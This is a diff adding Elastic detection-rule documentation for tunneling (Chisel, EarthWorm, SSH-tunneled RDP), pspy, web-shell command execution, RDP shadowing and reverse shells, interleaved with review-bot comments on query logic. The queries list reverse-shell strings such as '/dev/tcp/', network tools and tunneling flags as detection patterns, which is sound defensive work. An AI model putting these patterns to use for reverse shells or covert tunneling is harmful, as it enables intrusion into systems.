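Review bot: the false-positive section says this activity is unlikely to happen legitimately, yet the query carves out `user.id:("S-1-5-18" or "S-1-5-19")` combined with `file.directory: "C:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\SenseCM"`; document that known benign source in the false-positive analysis so analysts understand why it is excluded, and note that the exception requires both conditions, so a script from that directory run under any other account still alerts.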
@@ -0,0 +1,70 @@ +[[prebuilt-rule-8-10-5-potential-protocol-tunneling-via-chisel-client]] +=== Potential Protocol Tunneling via Chisel Client + +This rule monitors for common command line flags leveraged by the Chisel client utility followed by a connection attempt. Chisel is a command-line utility used for creating and managing TCP and UDP tunnels, enabling port forwarding and secure communication between machines. Attackers can abuse the Chisel utility to establish covert communication channels, bypass network restrictions, and carry out malicious activities by creating tunnels that allow unauthorized access to internal systems. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://blog.bitsadmin.com/living-off-the-foreign-land-windows-as-offensive-platform +* https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Command and Control +* Data Source: Elastic Defend + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id, process.entity_id with maxspan=1s + [process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and + process.args == "client" and process.args : ("R*", "*:*", "*socks*", "*.*") and process.args_count >= 4 and + process.parent.name in ("bash", "dash", "ash", "sh", "tcsh", "csh", "zsh", "ksh", "fish")] + [network where host.os.type == "linux" and event.action == "connection_attempted" and event.type == "start" and + destination.ip != null and destination.ip != "127.0.0.1" and 
destination.ip != "::1" and + not process.name : ( + "python*", "php*", "perl", "ruby", "lua*", "openssl", "nc", "netcat", "ncat", "telnet", "awk", "java", "telnet", + "ftp", "socat", "curl", "wget", "dpkg", "docker", "dockerd", "yum", "apt", "rpm", "dnf", "ssh", "sshd")] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Protocol Tunneling +** ID: T1572 +** Reference URL: https://attack.mitre.org/techniques/T1572/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-protocol-tunneling-via-chisel-server.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-protocol-tunneling-via-chisel-server.asciidoc new file mode 100644 index 0000000000..4ec7875ee6 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-protocol-tunneling-via-chisel-server.asciidoc 
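Review bot: the `process.name` exclusion list in the network stage contains `"telnet"` twice; drop the duplicate. Also, `maxspan=1s` between the client exec and `connection_attempted` is tight: the description promises "followed by a connection attempt", but a client that first resolves a hostname or retries may connect outside a one-second window, so consider aligning with the 1m span used by the companion server rule or stating the constraint in the description.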
@@ -0,0 +1,70 @@ +[[prebuilt-rule-8-10-5-potential-protocol-tunneling-via-chisel-server]] +=== Potential Protocol Tunneling via Chisel Server + +This rule monitors for common command line flags leveraged by the Chisel server utility followed by a received connection within a timespan of 1 minute. Chisel is a command-line utility used for creating and managing TCP and UDP tunnels, enabling port forwarding and secure communication between machines. Attackers can abuse the Chisel utility to establish covert communication channels, bypass network restrictions, and carry out malicious activities by creating tunnels that allow unauthorized access to internal systems. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://blog.bitsadmin.com/living-off-the-foreign-land-windows-as-offensive-platform +* https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Command and Control +* Data Source: Elastic Defend + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id, process.entity_id with maxspan=1m + [process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and + process.args == "server" and process.args in ("--port", "-p", "--reverse", "--backend", "--socks5") and + process.args_count >= 3 and process.parent.name in ("bash", "dash", "ash", "sh", "tcsh", "csh", "zsh", "ksh", "fish")] + [network where host.os.type == "linux" and event.action == "connection_accepted" and event.type == "start" and + destination.ip 
!= null and destination.ip != "127.0.0.1" and destination.ip != "::1" and + not process.name : ( + "python*", "php*", "perl", "ruby", "lua*", "openssl", "nc", "netcat", "ncat", "telnet", "awk", "java", "telnet", + "ftp", "socat", "curl", "wget", "dpkg", "docker", "dockerd", "yum", "apt", "rpm", "dnf", "ssh", "sshd", "hugo")] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Protocol Tunneling +** ID: T1572 +** Reference URL: https://attack.mitre.org/techniques/T1572/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-protocol-tunneling-via-earthworm.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-protocol-tunneling-via-earthworm.asciidoc new file mode 100644 index 0000000000..61f1039453 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-protocol-tunneling-via-earthworm.asciidoc 
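Review bot: as in the client rule, `"telnet"` appears twice in the `process.name` exclusion list; remove the duplicate. This list also adds `"hugo"`, which the client rule lacks; confirm whether that exception is needed on both sides, and add a short comment in the query explaining why hugo is excluded, since this rule has no investigation guide to record it.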
@@ -0,0 +1,66 @@ +[[prebuilt-rule-8-10-5-potential-protocol-tunneling-via-earthworm]] +=== Potential Protocol Tunneling via EarthWorm + +Identifies the execution of the EarthWorm tunneler. Adversaries may tunnel network communications to and from a victim system within a separate protocol to avoid detection and network filtering, or to enable access to otherwise unreachable systems. + +*Rule type*: eql + +*Rule indices*: + +* auditbeat-* +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* http://rootkiter.com/EarthWorm/ +* https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Command and Control +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and + process.args : "-s" and process.args : "-d" and process.args : "rssocks" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Protocol Tunneling +** ID: T1572 +** Reference URL: https://attack.mitre.org/techniques/T1572/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-pspy-process-monitoring-detected.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-pspy-process-monitoring-detected.asciidoc new file mode 100644 index 0000000000..f7268627e7 
--- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-pspy-process-monitoring-detected.asciidoc 
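Review bot: the description says the rule "identifies the execution of the EarthWorm tunneler", but the query only matches the argument triple `"-s"`, `"-d"` and `"rssocks"`, i.e. one invocation mode; either narrow the description to say which mode is covered or add a comment above the query stating that other invocations are out of scope, so analysts do not assume broader coverage. An inline comment naming what `rssocks` is would also help, as there is no investigation guide.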
@@ -0,0 +1,67 @@ +[[prebuilt-rule-8-10-5-potential-pspy-process-monitoring-detected]] +=== Potential Pspy Process Monitoring Detected + +This rule leverages auditd to monitor for processes scanning different processes within the /proc directory using the openat syscall. This is a strong indication for the usage of the pspy utility. Attackers may leverage the pspy process monitoring utility to monitor system processes without requiring root permissions, in order to find potential privilege escalation vectors. + +*Rule type*: eql + +*Rule indices*: + +* logs-auditd_manager.auditd-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/DominicBreuker/pspy + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Discovery + +*Version*: 3 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by process.pid, host.id with maxspan=5s +[ file where host.os.type == "linux" and event.dataset == "auditd_manager.auditd" and + auditd.data.syscall == "openat" and file.path == "/proc" and auditd.data.a0 : ("ffffffffffffff9c", "ffffff9c") and + auditd.data.a2 : ("80000", "88000") ] with runs=10 + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Discovery +** ID: TA0007 +** Reference URL: https://attack.mitre.org/tactics/TA0007/ +* Technique: +** Name: Process Discovery +** ID: T1057 +** Reference URL: https://attack.mitre.org/techniques/T1057/ +* Technique: +** Name: System Information Discovery +** ID: T1082 +** Reference URL: https://attack.mitre.org/techniques/T1082/ 
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-remote-code-execution-via-web-server.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-remote-code-execution-via-web-server.asciidoc new file mode 100644 index 0000000000..9edffa73bb --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-remote-code-execution-via-web-server.asciidoc 
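Review bot: the `auditd.data.a0` and `auditd.data.a2` values are unexplained hex literals; add a comment stating that for `openat` a0 is the directory fd and `"ffffffffffffff9c"`/`"ffffff9c"` is AT_FDCWD (-100 in 64- and 32-bit two's complement), while a2 holds the open flags, so a future editor knows why those exact values are required (the rule has no investigation guide to carry this). The tag list also has no `Data Source` entry although the rule reads only from `logs-auditd_manager.auditd-*`; the other rules in this patch tag their source.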
@@ -0,0 +1,154 @@ +[[prebuilt-rule-8-10-5-potential-remote-code-execution-via-web-server]] +=== Potential Remote Code Execution via Web Server + +Identifies suspicious commands executed via a web server, which may suggest a vulnerability and remote shell access. Attackers may exploit a vulnerability in a web application to execute commands via a web server, or place a backdoor file that can be abused to gain code execution as a mechanism for persistence. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://pentestlab.blog/tag/web-shell/ +* https://www.elastic.co/security-labs/elastic-response-to-the-the-spring4shell-vulnerability-cve-2022-22965 + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Initial Access +* Data Source: Elastic Endgame +* Use Case: Vulnerability +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 5 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Potential Remote Code Execution via Web Server + +Adversaries may backdoor web servers with web shells to establish persistent access to systems. A web shell is a malicious script, often embedded into a compromised web server, that grants an attacker remote access and control over the server. This enables the execution of arbitrary commands, data exfiltration, and further exploitation of the target network. 
+ +This rule detects a web server process spawning script and command line interface programs, potentially indicating attackers executing commands using the web shell. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. +> This investigation guide uses {security-guide}/security/current/osquery-placeholder-fields.html[placeholder fields] to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run. + +#### Possible investigation steps + +- Investigate abnormal behaviors by the subject process such as network connections, file modifications, and any other spawned child processes. + - Investigate listening ports and open sockets to look for potential reverse shells or data exfiltration. + - !{osquery{"label":"Osquery - Retrieve Listening Ports","query":"SELECT pid, address, port, socket, protocol, path FROM listening_ports"}} + - !{osquery{"label":"Osquery - Retrieve Open Sockets","query":"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets"}} + - Investigate the process information for malicious or uncommon processes/process trees. + - !{osquery{"label":"Osquery - Retrieve Process Info","query":"SELECT name, cmdline, parent, path, uid FROM processes"}} + - Investigate the process tree spawned from the user that is used to run the web application service. A user that is running a web application should not spawn other child processes. 
+ - !{osquery{"label":"Osquery - Retrieve Process Info for Webapp User","query":"SELECT name, cmdline, parent, path, uid FROM processes WHERE uid = {{process.user.id}}"}} +- Examine the command line to determine which commands or scripts were executed. +- Investigate other alerts associated with the user/host during the past 48 hours. +- If scripts or executables were dropped, retrieve the files and determine if they are malicious: + - Use a private sandboxed malware analysis system to perform analysis. + - Observe and collect information about the following activities: + - Attempts to contact external domains and addresses. + - Check if the domain is newly registered or unexpected. + - Check the reputation of the domain or IP address. + - File access, modification, and creation activities. + - Cron jobs, services and other persistence mechanisms. + - !{osquery{"label":"Osquery - Retrieve Crontab Information","query":"SELECT * FROM crontab"}} + +### False positive analysis + +- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and +event.action in ("exec", "exec_event") and process.parent.executable : ( + "/usr/sbin/nginx", "/usr/local/sbin/nginx", + "/usr/sbin/apache", "/usr/local/sbin/apache", + "/usr/sbin/apache2", "/usr/local/sbin/apache2", + "/usr/sbin/php*", "/usr/local/sbin/php*", + "/usr/sbin/lighttpd", "/usr/local/sbin/lighttpd", + "/usr/sbin/hiawatha", "/usr/local/sbin/hiawatha", + "/usr/local/bin/caddy", + "/usr/local/lsws/bin/lswsctrl", + "*/bin/catalina.sh" +) and +process.name : ("bash", "dash", "ash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "python*", "perl", "php*", "tmux") and +process.args : ("whoami", "id", "uname", "cat", "hostname", "ip", "curl", "wget", "pwd") and +not process.name == "phpquery" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Server Software Component +** ID: T1505 +** Reference URL: https://attack.mitre.org/techniques/T1505/ +* Sub-technique: +** Name: Web Shell +** ID: T1505.003 +** Reference URL: https://attack.mitre.org/techniques/T1505/003/ +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Exploit Public-Facing 
Application +** ID: T1190 +** Reference URL: https://attack.mitre.org/techniques/T1190/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-remote-desktop-shadowing-activity.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-remote-desktop-shadowing-activity.asciidoc new file mode 100644 index 0000000000..b09b36e12a --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-remote-desktop-shadowing-activity.asciidoc 
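Review bot: the `process.args` list (`"whoami", "id", "uname", "cat", "hostname", "ip", "curl", "wget", "pwd"`) matches those tokens at any argument position, and the parent patterns include `"/usr/sbin/php*"` and `"*/bin/catalina.sh"`, so application code that legitimately shells out (PHP wrappers or Tomcat start scripts running `hostname` or `uname`) will trigger; the false-positive section's "unlikely to happen legitimately" should acknowledge this and point analysts at the exception workflow. Separately, `not process.name == "phpquery"` only exists because `"php*"` in the `process.name` list would otherwise match phpquery; a one-line comment would stop the next reader from deleting it as dead code.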
@@ -0,0 +1,93 @@ +[[prebuilt-rule-8-10-5-potential-remote-desktop-shadowing-activity]] +=== Potential Remote Desktop Shadowing Activity + +Identifies the modification of the Remote Desktop Protocol (RDP) Shadow registry or the execution of processes indicative of an active RDP shadowing session. An adversary may abuse the RDP Shadowing feature to spy on or control other users active RDP sessions. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* winlogbeat-* +* logs-windows.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://bitsadm.in/blog/spying-on-users-using-rdp-shadowing +* https://swarm.ptsecurity.com/remote-desktop-services-shadowing/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Lateral Movement +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +/* Identifies the modification of RDP Shadow registry or + the execution of processes indicative of active shadow RDP session */ + +any where host.os.type == "windows" and +( + (event.category == "registry" and + registry.path : ( + "HKLM\\Software\\Policies\\Microsoft\\Windows NT\\Terminal Services\\Shadow", + "\\REGISTRY\\MACHINE\\Software\\Policies\\Microsoft\\Windows NT\\Terminal Services\\Shadow" + ) + ) or + (event.category == "process" and event.type == "start" and + (process.name : ("RdpSaUacHelper.exe", "RdpSaProxy.exe") and process.parent.name : "svchost.exe") or + (process.pe.original_file_name : "mstsc.exe" and 
process.args : "/shadow:*") + ) +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Remote Services +** ID: T1021 +** Reference URL: https://attack.mitre.org/techniques/T1021/ +* Sub-technique: +** Name: Remote Desktop Protocol +** ID: T1021.001 +** Reference URL: https://attack.mitre.org/techniques/T1021/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-remote-desktop-tunneling-detected.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-remote-desktop-tunneling-detected.asciidoc new file mode 100644 index 0000000000..56aea7d6d4 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-remote-desktop-tunneling-detected.asciidoc 
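Review bot: operator precedence in the process branch looks wrong. `event.category == "process" and event.type == "start" and (process.name : (...) and process.parent.name : "svchost.exe") or (process.pe.original_file_name : "mstsc.exe" and process.args : "/shadow:*")` parses as `(... and ... and A) or B` because `and` binds tighter than `or`, so the `mstsc.exe /shadow:*` test is not gated by `event.category == "process" and event.type == "start"` and can also fire on non-start process events carrying the same command line; wrap the two process sub-clauses in their own parentheses. The investigation guide block for this rule is also empty and should be populated or removed.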
@@ -0,0 +1,122 @@ +[[prebuilt-rule-8-10-5-potential-remote-desktop-tunneling-detected]] +=== Potential Remote Desktop Tunneling Detected + +Identifies potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* winlogbeat-* +* logs-windows.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://blog.netspi.com/how-to-access-rdp-over-a-reverse-ssh-tunnel/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Command and Control +* Tactic: Lateral Movement +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Potential Remote Desktop Tunneling Detected + +Protocol Tunneling is a mechanism that involves explicitly encapsulating a protocol within another for various use cases, ranging from providing an outer layer of encryption (similar to a VPN) to enabling traffic that network appliances would filter to reach their destination. + +Attackers may tunnel Remote Desktop Protocol (RDP) traffic through other protocols like Secure Shell (SSH) to bypass network restrictions that block incoming RDP connections but may be more permissive to other protocols. + +This rule looks for command lines involving the `3389` port, which RDP uses by default and options commonly associated with tools that perform tunneling. 
+ +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Identify the user account that performed the action and whether it should perform this kind of action. +- Contact the account and system owners and confirm whether they are aware of this activity. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts. +- Examine network data to determine if the host communicated with external servers using the tunnel. + +### False positive analysis + +- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary. +- Investigate the command line for the execution of programs that are unrelated to tunneling, like Remote Desktop clients. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- Take the necessary actions to disable the tunneling, which can be a process kill, service deletion, registry key modification, etc. Inspect the host to learn which method was used and to determine a response for the case. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. 
+- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + /* RDP port and usual SSH tunneling related switches in command line */ + process.args : "*:3389" and + process.args : ("-L", "-P", "-R", "-pw", "-ssh") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Protocol Tunneling +** ID: T1572 +** Reference URL: https://attack.mitre.org/techniques/T1572/ +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Remote Services +** ID: T1021 +** Reference URL: https://attack.mitre.org/techniques/T1021/ +* Sub-technique: +** Name: SSH +** ID: T1021.004 +** Reference URL: https://attack.mitre.org/techniques/T1021/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-reverse-shell-activity-via-terminal.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-reverse-shell-activity-via-terminal.asciidoc new file mode 100644 index 0000000000..3152876b9f --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-reverse-shell-activity-via-terminal.asciidoc 
@@ -0,0 +1,113 @@ +[[prebuilt-rule-8-10-5-potential-reverse-shell-activity-via-terminal]] +=== Potential Reverse Shell Activity via Terminal + +Identifies the execution of a shell process with suspicious arguments which may be indicative of reverse shell activity. + +*Rule type*: eql + +*Rule indices*: + +* auditbeat-* +* logs-endpoint.events.* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md +* https://github.com/WangYihang/Reverse-Shell-Manager +* https://www.netsparker.com/blog/web-security/understanding-reverse-shells/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* OS: macOS +* Use Case: Threat Detection +* Tactic: Execution +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Potential Reverse Shell Activity via Terminal + +A reverse shell is a mechanism that's abused to connect back to an attacker-controlled system. It effectively redirects the system's input and output and delivers a fully functional remote shell to the attacker. Even private systems are vulnerable since the connection is outgoing. This activity is typically the result of vulnerability exploitation, malware infection, or penetration testing. + +This rule identifies commands that are potentially related to reverse shell activities using shell applications. + +#### Possible investigation steps + +- Examine the command line and extract the target domain or IP address information. 
+ - Check if the domain is newly registered or unexpected. + - Check the reputation of the domain or IP address. + - Scope other potentially compromised hosts in your environment by mapping hosts that also communicated with the domain or IP address. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections. +- Investigate any abnormal behavior by the subject process such as network connections, file modifications, and any spawned child processes. + +### False positive analysis + +- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Take actions to terminate processes and connections used by the attacker. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). 
+---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where event.type in ("start", "process_started") and + process.name in ("sh", "bash", "zsh", "dash", "zmodload") and + process.args : ("*/dev/tcp/*", "*/dev/udp/*", "*zsh/net/tcp*", "*zsh/net/udp*") and + + /* noisy FPs */ + not (process.parent.name : "timeout" and process.executable : "/var/lib/docker/overlay*") and + not process.command_line : ( + "*/dev/tcp/sirh_db/*", "*/dev/tcp/remoteiot.com/*", "*dev/tcp/elk.stag.one/*", "*dev/tcp/kafka/*", + "*/dev/tcp/$0/$1*", "*/dev/tcp/127.*", "*/dev/udp/127.*", "*/dev/tcp/localhost/*", "*/dev/tcp/itom-vault/*") and + not process.parent.command_line : "runc init" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-reverse-shell-via-background-process.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-reverse-shell-via-background-process.asciidoc new file mode 100644 index 0000000000..ef29cf1f3d --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-reverse-shell-via-background-process.asciidoc 
